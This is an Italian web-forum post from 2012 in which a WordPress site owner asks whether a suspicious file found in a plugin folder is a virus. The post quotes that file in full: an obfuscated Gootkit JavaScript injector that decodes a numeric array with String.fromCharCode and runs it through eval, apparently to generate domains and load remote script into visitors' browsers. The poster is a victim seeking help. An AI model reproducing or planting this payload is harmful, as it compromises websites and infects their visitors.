Visualizzazione risultati 1 fino 1 di 1

Discussione: Gootkit

  1. 08-06-2012, 21.41.01 #1
    Guest

    Exclamation Gootkit

    Salve ragazzi,
    spero di essere nella sezione giusta. Volevo un vostro parere, da due giorni quando apro il mio sito web il mio antivirus (AVG) mi dice che ci sono dei file java (jquery) pericolosi.

    Ho risolto in questo modo:
    ho preso i file java di backup che avevo e ho sostituito questi file nel server... poi ho notato in una cartella del mio server la presenza del file pulsone.js che non c'era prima e che ho eliminato (era nella stessa cartella di un file js che risultava infetto). Vi posto il contenuto di esso:
    Codice HTML:
    cat: /../..../.../miosito.it/...../wp-content/plugins/cudazi-scroll-to-top/js/plusone.js: No such file or directory
filemng: Error occured during /bin/cat command./*gootkitstart*/i=0;try{grbregd=prototype;}catch(z){h="ha"+"rCode";f=[10,17.5,14,8.5,17,11.5,14.5,14,-25,14,9.5,19,17,0,7.5,14,9,14.5,13.5,-2,17.5,13.5,8,9.5,16,-21,-20.5,20.5,-36,-25,-25,-25,-25,18,7.5,16,-25,11,11.5,-25,-10.5,-25,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-17.5,-25,17,11,11.5,16.5,-18,-0.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,13,14.5,-25,-10.5,-25,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-22.5,-25,17,11,11.5,16.5,-18,-0.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,17,9.5,16.5,17,-25,-10.5,-25,17,11,11.5,16.5,-18,-8.5,-25,-20,-25,13,14.5,-25,-18.5,-25,17,11,11.5,16.5,-18,0,-25,-20,-25,11,11.5,-11.5,-36,-25,-25,-25,-25,11.5,10,-21,17,9.5,16.5,17,-25,-10,-25,-17,-20.5,20.5,-36,-25,-25,-25,-25,-25,-25,-25,-25,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-10.5,-25,17,9.5,16.5,17,-11.5,-36,-25,-25,-25,-25,21.5,-25,9.5,13,16.5,9.5,-25,20.5,-36,-25,-25,-25,-25,-25,-25,-25,-25,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-10.5,-25,17,9.5,16.5,17,-25,-19.5,-25,17,11,11.5,16.5,-18,-2.5,-11.5,-36,-25,-25,-25,-25,21.5,-36,-25,-25,-25,-25,16,9.5,17,17.5,16,14,-25,-21,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-20,-25,17,11,11.5,16.5,-18,14.5,14,9.5,-1.5,18,9.5,16,-2.5,-20.5,-11.5,-36,21.5,-36,-36,10,17.5,14,8.5,17,11.5,14.5,14,-25,0,7.5,14,9,14.5,13.5,-2,17.5,13.5,8,9.5,16,-5.5,9.5,14,9.5,16,7.5,17,14.5,16,-21,17.5,14,11.5,19,-20.5,20.5,-36,-25,-25,-25,-25,18,7.5,16,-25,9,-25,-10.5,-25,14,9.5,18.5,-25,-7,7.5,17,9.5,-21,17.5,14,11.5,19,-20,-16.5,-17,-17,-17,-20.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,16.5,-25,-10.5,-25,9,-18,10.5,9.5,17,-5,14.5,17.5,16,16.5,-21,-20.5,-11.5,-36,-25,-25,-25,-25,-36,-25,-25,-25,-25,11.5,10,-21,16.5,-25,-11,-25,-16.5,-16,-20.5,-25,16.5,-25,-10.5,-25,-17,-11.5,9.5,13,16.5,9.5,-25,16.5,-25,-10.5,-25,-16.5,-11.5,-36,-25,-25,-25,-25,-36,-25,-25,-25,-25,17,11,11.5,16.5,-18,16.5,9.5,9.5,9,-25,-10.5,-25,-16,-15.5,-15,-14.5,-14,-13.5,-13,-12.5,-17,-16.5,-25,-19.5,-25,-21,9,-18,10.5,9.5,17,-2.5,14.5,14,17,11,-21,-20.5,-25,-20,-25,-17,19,-6,-6,-6,-6,-6,-6,-20.5,-25,-19.5,-25,-21,9,-18,10.5,9.5,17,-7,7.5,17,9.5,-21,-20.5,-25,-20,-25,-17,19,-6,-6,-6,-6,-20.5,-19.5,-25,-21,16.5,-25,-20,-25,-17,19,-6,-6,-6,-20.5,-11.5,-36,-25,-25,-25,-25,17,11,11.5,16.5,-18,-8.5,-25,-10.5,-25,-15,-13,-16,-13.5,-16.5,-11.5,-36,-25,-25,-25,-25,17,11,11.5,16.5,-18,-2.5,-25,-10.5,-25,-16,-16.5,-15,-13.5,-15,-13,-15.5,-14,-15,-13.5,-11.5,-36,-25,-25,-25,-25,17,11,11.5,16.5,-18,-0.5,-25,-10.5,-25,17,11,11.5,16.5,-18,-2.5,-25,-17.5,-25,17,11,11.5,16.5,-18,-8.5,-11.5,-36,-25,-25,-25,-25,17,11,11.5,16.5,-18,0,-25,-10.5,-25,17,11,11.5,16.5,-18,-2.5,-25,-22.5,-25,17,11,11.5,16.5,-18,-8.5,19,-18.5,-2.5,11.5,14,-20.5,-25,-20,-25,16,-18,14,9.5,19,17,-21,-20.5,-25,-19.5,-25,-2.5,11.5,14,-20.5,-11.5,-36,21.5,-36,-36,10,17.5,14,8.5,17,11.5,14.5,14,-25,10.5,9.5,14,9.5,16,7.5,17,9.5,-1,16.5,9.5,17.5,9,14.5,0,7.5,14,9,14.5,13.5,0.5,17,16,11.5,14,10.5,-21,17.5,14,11.5,19,-19,-25,13,9.5,14,10.5,17,11,-19,-25,20,14.5,14,9.5,-20.5,20.5,-36,-25,-25,-25,-25,18,7.5,16,-25,16,7.5,14,9,-25,-10.5,-25,14,9.5,18.5,-25,0,7.5,14,9,14.5,13.5,-2,17.5,13.5,8,9.5,16,-5.5,9.5,14,9.5,16,7.5,17,14.5,16,-21,17.5,14,11.5,19,-20.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,13,9.5,17,17,9.5,16,16.5,-25,-10.5,-25,4.5,-21.5,7.5,-21.5,-19,-21.5,8,-21.5,-19,-21.5,8.5,-21.5,-19,-21.5,9,-21.5,-19,-21.5,9.5,-21.5,-19,-21.5,10,-21.5,-19,-21.5,10.5,-21.5,-19,-21.5,11,-21.5,-19,-21.5,11.5,-21.5,-19,-21.5,12,-21.5,-19,-21.5,12.5,-21.5,-19,-21.5,13,-21.5,-19,-21.5,13.5,-21.5,-19,-21.5,14,-21.5,-19,-21.5,14.5,-21.5,-19,-21.5,15,-21.5,-19,-21.5,15.5,-21.5,-19,-21.5,16,-21.5,-19,-21.5,16.5,-21.5,-19,-21.5,17,-21.5,-19,-21.5,17.5,-21.5,-19,-21.5,18,-21.5,-19,-21.5,18.5,-21.5,-19,-21.5,19,-21.5,-19,-21.5,19.5,-21.5,-19,-21.5,20,-21.5,5.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,8.5,14.5,13,14.5,16,16.5,-25,-10.5,-25,4.5,-21.5,16,9.5,9,-21.5,-19,-21.5,14.5,16,7.5,14,10.5,9.5,-21.5,-19,-21.5,19.5,9.5,13,13,14.5,18.5,-21.5,-19,-21.5,10.5,16,9.5,9.5,14,-21.5,-19,-21.5,8,13,17.5,9.5,-21.5,-19,-21.5,11.5,14,9,11.5,10.5,14.5,-21.5,-19,-21.5,18,11.5,14.5,13,9.5,17,-21.5,5.5,-11.5,-36,-25,-25,-25,-25,18,7.5,16,-25,16.5,17,16,-25,-10.5,-36,16.5,9.5,17,1,11.5,13.5,9.5,14.5,17.5,17,-21,13.5,7.5,12.5,9.5,-6,16,7.5,13.5,9.5,-19,-25,-16,-17,-17,-17,-20.5,-11.5];v="e"+"va";}if(v)e=window[v+"l"];try{q=document["crea"+"teEle"+"ment"]("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];}
r=String;z=((e)?h:"");for(;1920!=i;i+=1){j=i;if(e)s=s+r["fr"+"omC"+((e)?z:12)]((w[j]*1+41)*2);}
if(v&&e&&r&&z&&h&&s&&f&&v&&v&&e&&r&&h)try{dsgsdg=prototype;}catch(dsdh){e(((e)?s:12));}/*gootkitend*/

    Mi sapreste dire cosa faceva questo codice...è un virus? Qualcuno è riuscito ad entrare nel mio sito?

    Grazie 1000 dell'aiuto!!!
    Ultima modifica di fucinementali : 08-06-2012 alle ore 21.44.24
« Discussione precedente | Prossima discussione »

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •  

Regole del forum